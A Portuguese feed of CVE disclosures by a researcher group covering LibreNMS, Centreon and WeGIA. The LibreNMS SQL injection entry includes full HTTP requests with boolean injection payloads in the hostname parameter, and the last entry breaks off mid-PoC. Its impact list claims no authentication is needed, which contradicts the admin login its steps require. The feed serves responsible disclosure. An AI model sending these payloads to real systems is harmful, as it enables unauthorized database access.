<blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 18 Nov 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-65014/ https://www.cvehunters.com/pt/p/cve-2025-65014/ <h2 id="cve-2025-65014-vulnerabilidade-de-política-de-senhas-fraca-na-função-gerenciamento-de-usuário">CVE-2025-65014: Vulnerabilidade de Política de Senhas Fraca na função Gerenciamento de Usuário </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65014" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65014</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de gerenciamento de usuário do aplicativo LibreNMS. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como <code>123456</code>. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo não impõe uma política de senhas fortes ao criar novos usuários. Como resultado, os administradores podem definir senhas fracas, triviais e conhecidas, comprometendo a segurança de autenticação do sistema.</p><h2 id="cve-2025-65014-vulnerabilidade-de-política-de-senhas-fraca-na-função-gerenciamento-de-usuário">CVE-2025-65014: Vulnerabilidade de Política de Senhas Fraca na função Gerenciamento de Usuário </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65014" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65014</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Política de Senhas Fracas foi identificada na funcionalidade de gerenciamento de usuário do aplicativo LibreNMS. Essa vulnerabilidade permite a criação de contas com senhas extremamente fracas e previsíveis, como <code>123456</code>. Isso expõe a plataforma a ataques de força bruta e preenchimento de credenciais.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo não impõe uma política de senhas fortes ao criar novos usuários. Como resultado, os administradores podem definir senhas fracas, triviais e conhecidas, comprometendo a segurança de autenticação do sistema.</p></p> <p>Componente vulnerável: <code>Criação de usuário / definição de senha</code></p> <h3 id="poc">PoC </h3><p style="text-align: justify;"> <ul> <li>Faça login no aplicativo usando uma conta de <b>Administrador</b>.</li> <li>Navegue até a seção de gerenciamento de usuários:</li> <li>Crie uma nova conta de usuário usando a senha <code>12345678</code>.</li> <li>O aplicativo aceita senhas fracas sem restrições e cria a conta com sucesso.</li> </ul> </p> <p><img src="/p/cve-2025-65014/image.png" width="1103" height="852" srcset="/p/cve-2025-65014/image_hu_21856582e6cd0438.png 480w, /p/cve-2025-65014/image_hu_bd6251cd2138ff.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="129" data-flex-basis="310px" /></p> <p><img src="/p/cve-2025-65014/image-1.png" width="1359" height="487" srcset="/p/cve-2025-65014/image-1_hu_b22d3f1498de98f3.png 480w, /p/cve-2025-65014/image-1_hu_b4baf5a5f4a79968.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="279" data-flex-basis="669px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Aumento do risco de ataques de força bruta e de preenchimento de credenciais.</li> <li>Acesso não autorizado a contas de usuários ou administrativas.</li> <li>Aumento de privilégios por meio de contas comprometidas.</li> <li>Postura geral de segurança do aplicativo reduzida.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g" target="_blank" rel="noopener" >https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 18 Nov 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-65093/ https://www.cvehunters.com/pt/p/cve-2025-65093/ <h2 id="cve-2025-65093-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-hostname-do-endpoint-ajax_outputphp">CVE-2025-65093: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro <code>hostname</code> do Endpoint <code>ajax_output.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65093" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65093</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>hostname</code> do endpoint <code>ajax_output.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>hostname</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-65093-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-hostname-do-endpoint-ajax_outputphp">CVE-2025-65093: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro <code>hostname</code> do Endpoint <code>ajax_output.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-65093" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-65093</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>hostname</code> do endpoint <code>ajax_output.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>hostname</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>ajax_output.php</code></p> <p>Parâmetro: <code>hostname</code></p> <p style="text-align: justify;"> <ul> <li><b>Autentique-se com uma conta de administrador.</b></br> O endpoint de descoberta <code>/ajax_output.php</code> só é acessível a usuários com privilégios de administrador.</li> <li>Acesse a seguinte URL com o payload que avalia para <code>TRUE</code>:</code></li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=1+AND+'1'='1 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.0.5.5:8000 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://10.0.5.5:8000/device/3/capture </span></span><span class="line"><span class="cl">Cookie: laravel_session=[ADMIN_SESSION_COOKIE] </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Observe que o sistema retorna os dados esperados e aciona o processo de descoberta.</li> </ul> </p> <p><img src="/p/cve-2025-65093/image.png" width="1507" height="666" srcset="/p/cve-2025-65093/image_hu_be0427b4a619e324.png 480w, /p/cve-2025-65093/image_hu_7986fb62e6a5776b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="226" data-flex-basis="543px" /></p> <p style="text-align: justify;"> <ul> <li>Agora repita a solicitação com a condição <code>FALSE</code>:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /ajax_output.php?id=capture&format=text&type=discovery&hostname=10.0.5.4'+AND+1=2+AND+'1'='1 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.0.5.5:8000 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://10.0.5.5:8000/device/3/capture </span></span><span class="line"><span class="cl">Cookie: laravel_session=[SESSION COOKIE] </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Observe que a resposta foi alterada: nenhum dispositivo foi encontrado e nenhuma descoberta foi acionada.</li> </ul> </p> <p><img src="/p/cve-2025-65093/image-1.png" width="1496" height="662" srcset="/p/cve-2025-65093/image-1_hu_fd11cdac0c88dc23.png 480w, /p/cve-2025-65093/image-1_hu_88de69507b3ff869.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="225" data-flex-basis="542px" /></p> <blockquote> <p>A diferença na saída confirma que a lógica booleana injetada está sendo executada pelo banco de dados.</p> </blockquote> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9" target="_blank" rel="noopener" >https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 18 Nov 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54889/ https://www.cvehunters.com/pt/p/cve-2025-54889/ <h2 id="cve-2025-54889-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54889: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54889" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54889</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração do fabricante de traps SNMP.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração do fabricante de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p><h2 id="cve-2025-54889-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54889: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54889" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54889</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração do fabricante de traps SNMP.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração do fabricante de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54891/ https://www.cvehunters.com/pt/p/cve-2025-54891/ <h2 id="cve-2025-54891-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54891: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54891" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54891</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de Acesso a Recursos do ACL.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração de acesso a recursos do ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p><h2 id="cve-2025-54891-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54891: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54891" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54891</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de Acesso a Recursos do ACL.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração de acesso a recursos do ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54892/ https://www.cvehunters.com/pt/p/cve-2025-54892/ <h2 id="cve-2025-54892-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54892: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54892" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54892</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração do grupo de traps SNMP.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração do grupo de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p><h2 id="cve-2025-54892-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54892: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54892" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54892</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração do grupo de traps SNMP.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração do grupo de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54893/ https://www.cvehunters.com/pt/p/cve-2025-54893/ <h2 id="cve-2025-54893-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54893: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54893" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54893</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de modelos de Hosts</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p><h2 id="cve-2025-54893-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring">CVE-2025-54893: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54893" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54893</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Um usuário com privilégios elevados pode injetar XSS na página de configuração de modelos de Hosts</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou "Cross-site Scripting") no Centreon Infra Monitoring (módulos de configuração dos Conectores de Comandos) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54893-centreon-web-all-versions-medium-severity-5120</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 14 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-62361/ https://www.cvehunters.com/pt/p/cve-2025-62361/ <h2 id="cve-2025-62361-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp">CVE-2025-62361: Vulnerabilidade de Open Redirect no parâmetro <code>nextPage</code> do endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-62361" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-62361</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Open Redirect foi identificada no endpoint <code>control.php</code> do aplicativo WeGIA, especificamente no parâmetro <code>nextPage</code> (metodo=listarTodos nomeClasse=AlmoxarifeControle).</br></br>Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro <code>nextPage</code>.</br></br>Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.</p><h2 id="cve-2025-62361-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp">CVE-2025-62361: Vulnerabilidade de Open Redirect no parâmetro <code>nextPage</code> do endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-62361" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-62361</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Open Redirect foi identificada no endpoint <code>control.php</code> do aplicativo WeGIA, especificamente no parâmetro <code>nextPage</code> (metodo=listarTodos nomeClasse=AlmoxarifeControle).</br></br>Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro <code>nextPage</code>.</br></br>Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.</p></p> <p>Endpoint vulnerável: <code>GET /WeGIA/controle/control.php?metodo=listarTodos&nomeClasse=AlmoxarifeControle&nextPage=</code></p> <p>Parâmetro: <code>nextPage</code></p> <h3 id="poc">PoC </h3><h4 id="request">Request: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 